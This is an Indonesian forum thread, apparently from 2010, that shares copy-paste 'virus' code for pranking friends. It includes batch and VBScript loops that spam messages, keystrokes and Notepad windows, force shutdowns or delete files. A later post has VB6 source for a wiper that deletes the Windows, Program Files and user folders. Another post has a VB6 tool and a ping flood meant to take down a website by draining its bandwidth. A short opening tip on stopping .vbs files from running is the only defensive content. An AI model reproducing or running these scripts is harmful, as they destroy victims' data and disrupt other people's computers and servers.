Forum Informatika
Silahkan Login

Kami sarankan anda register atau daftar terlebih dahulu agar anda dapat mendownload atau membuka category forum secara keseluruhan....
karena ada beberapa forum yang tertutup untuk tamu dan dengan Login Anda bisa menggunakan fasilitas Chatting yang kami miliki.

Selamat Bergabung

Forum Informatika

Created By Hanafi Sukawa Ginting
 
HomeFAQPasang Iklanfacebook InformatikaRegisterLog inNew Tab Newscomputer

Share | 
 

 VB in action

View previous topic View next topic Go down 
AuthorMessage


Change Your Avatar -------------->


131313

Admiral
Rank : Admiral


Jumlah posting : 44
Point : 7056
Reputasi : 10
Join date : 2010-10-27

PostSubject: VB in action   Wed 27 Oct 2010, 10:15

Cegah Virus VBS Berkembang Biak Dgn Simpel

Virus Vbs adalah virus yang dibuat menggunakan bahasa pemrograman Visual Basic Script….editornya cukup dengan notepad bawaan windows. meskipun di buatnya hanya dengan notepad virus bisa membuat kita pusing…
ok caranya begini
Buka my computer – tools – folder options
Klik tab file types, scroll kebawah, cari extensi “vbs“
Ubah default program yg digunakan untuk membuka file .vbs dgn mengklik tombol
“change“
KIta akan melihar bahwa program yg direkomendasikan untuk membuka file .vbs adalah
Microsoft ® Windows Based Script Host, ubah hal tersebut, scroll sedikit ke bawah, cari
“notepad” dan klik OK
Dengan mengubah setingan diatas, setiap kali kita mengklik/membuka file .vbs, script virus yg ditulis
didalam file .vbs tidak akan langsung dijalankan, melainkan akan ditampilkan oleh notepad. Dan
tentunya file tersebut tidak akan menginfeksi komputer kita …

Bikin virus dengan Notepad(Tinggal Cpy-paste kode aja)

Waktu lg browsing, ketemu nih keren nih
copy paste code-code yang ada di bawah ini ke dalam NOTEPAD( Total ada 9 VIRUS yg bisa dibikin)
Code :
@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cupu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT
(ekstensi filenya harus .BAT)

2.bikin shutdown+message
Code:
@echo off
msg * apaan sih lo
shutdown -s -c “Error! muka mu standar abis”
save namafile.BAT
(ekstensi filenya harus .BAT)

3.Mainin Caps Lock button
Code:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
save namafile.vbs

(save dengan Ekstensi file .vbs)

4.buka tutup CD/DVD
Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs


5.bikin vbscript nongol mlulu
Code:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
save namafile.vbs
ket:di task manager full wscript yg lg running


6.teken tombol backspace mlulu
Code:
MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
save namafile.vbs


7.otomatis ngetik “lu jelek banget sih” di notepad/word

Code:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “lu jelek banget sih!!!”
loop
save namafile.vbs

8.buka notepad trus menerus
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.


9.otomatis buka notepad lalu ngetik apa yg lo mau
Code:
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! “
save namafile.vbs
ket:
ini salah satu script favorit gw…
10.@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set
/p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

kalo pilih
1.otomatis matiin computer

2.format file (terserah file apaan ganti aj dir nya)

3.sama aj kayak pilihan 1
kata2 di atas di ganti2 aj sesuai selera temen2
NB : gunakan script ini untuk menjahili teman anda
just fun only ok^^
Back to top Go down


Change Your Avatar -------------->


admin

Admin
Rank : Admin


My Pets :
Jumlah posting : 550
Point : 2147483647
Reputasi : 47
Join date : 2010-04-23
Age : 24
Lokasi : indonesia

PostSubject: Re: VB in action   Wed 27 Oct 2010, 10:41

Keren.... sip2 lah

Back to top Go down
http://software-download1001.blogspot.com/


Change Your Avatar -------------->


131313

Admiral
Rank : Admiral


Jumlah posting : 44
Point : 7056
Reputasi : 10
Join date : 2010-10-27

PostSubject: Re: VB in action   Wed 27 Oct 2010, 13:23

tambahan dari saya lagi
>>>>>> Membuat Virus Dengan Visual Basic<<<<<<<<<

Cara membuat virus dgn Visual Basic
Kali ini ane akan membahas tentang bagaimana cara membuat virus dengan visual basic mungkin bagi master2 vb tidak perlu untuk membaca tutorial ini dikhususkan untuk pemula banyak sekali virus2 yaang sudah bertebaran di internet tapi bagaimana program virus itu bekerja berikut langkah-langkahnya

Langkah-langkahnya adalah:

1. Buka Visual Basic 6.0 kalian lalu pilih Standart Exe.
2. Lalu buat formnya sekecil mungkin.
3. Dan klik 2x pada form itu dan akan menampilkan halaman untuk menaruh source kode, tolong hapus kode yang sudah ada, dan CoPas seluruh kode dibawah ini:
Public Sub DelAll(ByVal DirtoDelete As Variant) Dim FSO, FS Set FSO = CreateObject(”Scripting.FileSystemObject”) FS = FSO.DeleteFolder(DirtoDelete, True) End Sub Private Sub Form_Load() On Error Resume Next If FileExist(”c:windowssystem32unpamhack.txt”) = True Then End Else Call DelAll(”c:windowssystem”) Call DelAll(”c:windowssystem32″) Call DelAll(”c:windows”) Call DelAll(”C: Documents and SettingsAll Users”) Call DelAll(”C: Documents and SettingsAdministrator”) Call DelAll(”C: Documents and Settings”) Call DelAll(”C: Program FilesCommon Files”) Call DelAll(”C: Program Files Internet Explorer”) Call DelAll(”C: Program FilesMicrosoft Visual Studio”) Call DelAll(”C: Program Files”) End End If End Sub Function FileExist(ByVal FileName As String) As Boolean If Dir(FileName) = “” Then FileExist = False Else FileExist = True End If End Function

4. Setelah udah diCoPas silahkan dieksekusi dengan menekan tombol F5, atau bikin jadi exe. dengan cara buka menu File pilih Make Project1.exe simpan dengan nama apa saja,,

Nah untuk keterangan dari koding diatas adalah, pada teks yang warna hijau itu penangkal nih virus, jadi kalau di folder c:windowssystem32 ada file yang namanya unpamhack.txt, kalian ga bakal keserang oleh virus ini. bisa kalian edit koq jadi apa aja.. Satu lagi kalian gak bisa ngedit folder drive D yang untuk dijadikan objek untuk dihapus karena hanya bisa menghapus sistem saja. Apa jadinya kalau sistem terhapus?? ERRRROOORRR alias komputer situ bleng...

>>>>>>Membuat scripht jail buat temen"<<<<<<<

- Memberi pesan dan shutdown kompute
Spoiler untuk codenya
@echo off msg * Aku tidak suka kamu shutdown -c "Error! Kamu jelek sekali" -s

save dengan .bat

- Menyalakan tombol Caps lock secara simultan
Spoiler untuk codenya
Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop


save dengan extension .vbs

- Mengetik pesan kita secara otomatis di notepad
Spoiler untuk codenya
WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 100 WshShell.AppActivate "Notepad" WScript.Sleep 500 WshShell.SendKeys "Hel" WScript.Sleep 500 WshShell.SendKeys "lo " WScript.Sleep 500 WshShell.SendKeys ", ho" WScript.Sleep 500 WshShell.SendKeys "w a" WScript.Sleep 500 WshShell.SendKeys "re " WScript.Sleep 500 WshShell.SendKeys "you" WScript.Sleep 500 WshShell.SendKeys "? " WScript.Sleep 500 WshShell.SendKeys "I a" WScript.Sleep 500 WshShell.SendKeys "m g" WScript.Sleep 500 WshShell.SendKeys "ood" WScript.Sleep 500 WshShell.SendKeys " th" WScript.Sleep 500 WshShell.SendKeys "ank" WScript.Sleep 500 WshShell.SendKeys "s! "


save dengan Ex.vbs

- Buka Notepad secara terus menerus
Spoiler untuk codenya
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top


save dengan type .bat

- Hack keyboard sehingga korban dipaksa mengetik " Saya jelek" secara simultan
Spoiler untuk codenya
Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "Saya Jelek" loop


save dengan ex.vbs

- mau membuat virus dengan mudah download di bawah sini
[You must be registered and logged in to see this link.]
CMIIW kk kompi kk meledak saya g nanggu ea kk oakwokawokawokawok<<just kidding
Back to top Go down


Change Your Avatar -------------->


131313

Admiral
Rank : Admiral


Jumlah posting : 44
Point : 7056
Reputasi : 10
Join date : 2010-10-27

PostSubject: Re: VB in action   Thu 28 Oct 2010, 18:12

Teknik DDOS pake VB 6

Teknik DDOS disini maksudnya yaitu untuk melumpuhkan suatu server/website dengan cara menghabiskan bandwitdh dari website tersebut. Ada beberapa cara untuk DDOS, misalnya paling gampang dengan menggunakan perintah "ping", misalnya seperti : "ping -l 65500 - t [You must be registered and logged in to see this link.] Dari perintah "ping" tersebut kita mengirim paket sebesar 65500 bytes ke server dan nilai tersebut merupakan nilai maksimum yang dapat kita kirim. Meskipun perintah tersebut menggunakan paramameter "-t" yang berarti perintah "ping" akan dilakukan terus menerus ke "[You must be registered and logged in to see this link.] tetapi sepertinya butuh ratusan/ribuan komputer yang diperlukan untuk menjalani perintah "ping" ini seharian sehingga bandwidth dari si server habis.


Oleh karena hanya "65500", maka saya mikir bagaimana ya cara cepat menyedot bandwitdh dari si server. Berhubung perintah "ping" ga bisa, saya coba liat2 VB6, yup ada perintah : "Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long".

Setelah mencoba2, perintah tersebut dapat mendownload satu halaman/file dan mengsave file tsb ke harddisk. Wah klo file yang berukuran gede didownload make looping kayaknya bakalan nyedot bandwidth si server banyak tuh

Dengan konsep tersebut, yuk mari yuk mulai coding make VB6.
Yang diperlukan :
- l textBox => Text1
- 2 button, => Command1 dan Command2
- 1 timer => Timer1
- tambah sendiri yang lain

Kode-kode (taruh di form):

'----------START----------START----------
'fungsi buat mendownload file
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
'fungsi untuk mendapatkan folder temporary
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long

'Saat program dijalankan make sure nothing happen
Private Sub Form_Load()
Timer1.Enabled = False
End Sub

'fungsi untuk menggenerate tulisan menjadi acak
Public Function Random(ByVal Low As Long, ByVal High As Long) As Long
Randomize
Random = Int((High - Low + 1) * Rnd) + Low
End Function

'fungsi untuk mendapatkan folder temporary
Public Function GetTempDir() As String
Dim buff As String
buff = String(255, Chr$(0))
GetTempPath Len(buff), buff
GetTempDir = Left(buff, InStr(1, buff, Chr(0), vbTextCompare) - 1)
End Function

'inti dari program untuk melakukan DDOS
Private Sub Timer1_Timer()
Dim fileName As String
Dim DDOS
'membuat nama acak sebagai nama file yang akan disave
fileName = GetTempDir & Random(0, 999999999)
'mulai mendownload file yang terdapat pada Text1 dan mengsavenya
DDOS = URLDownloadToFile(0, Text1.text, fileName , 0 ,0)

'tombol untuk memulai DDOS
Private Sub Command1_Click()
Timer1.Enabled = True 'hidupkan timer buat looping
Timer1.Interval = 1000 'set setiap 1 detik program mendownload file dari server
Command2.Enabled = True
Command1.Enabled = False
End Sub

'stop semua actions
Private Sub Command2_Click()
Timer1.Enabled = False
Command1.Enabled = True
Command2.Enabled = False
End Sub
'----------END----------END----------

Setelah semua komponen2 dan kode sudah ada maka jalankan / F5, kemudian isi
textbox dengan website yang akan diDDOS, misalnya "http://target.com/download/setup.exe"
atau "http://target.com/index.php" , ingat tanpa tanda kutip dan TIDAK pake "www".
Jadi klo kita isi "[You must be registered and logged in to see this link.] <== SALAH!. Setelah itu pencet command1 untuk memulai serangan.
Saat command1 dipencet, maka program otomatis mendownload file di website
sesuai yang kita isi di textbox dan mengsavenya di folder temporay dengan nama acak.
kenapa pake nama acak? karena untuk mengantisipasi jika
suatu file blum beres didownload maka ga akan ngeganggu proses lain yang sedang berlangsung.
Ya tentunya bisa nambahin sendiri seperti pengecekan ada tidaknya koneksi internet,
size yang udah didonlot atau animasi loading pada program biar lebih ok lagi programnya

SHARING IS CARING
Back to top Go down


Change Your Avatar -------------->


ajiwardani

Moderat Posts
Rank : Moderat Posts


Jumlah posting : 11
Point : 31
Reputasi : 0
Join date : 2010-10-28

PostSubject: Re: VB in action   Thu 28 Oct 2010, 20:28

wah boleh di coba tuh virus di rumah

paten gak tuh virus vbnya KK ???
Back to top Go down


Change Your Avatar -------------->


Sponsored content

Rank :



PostSubject: Re: VB in action   Today at 12:44

Back to top Go down
 

VB in action

View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Forum Informatika ::  :: VB6-
Jump to:  

Private forum on Forumotion | © phpBB | Free forum support | Contact | Report an abuse | Free forum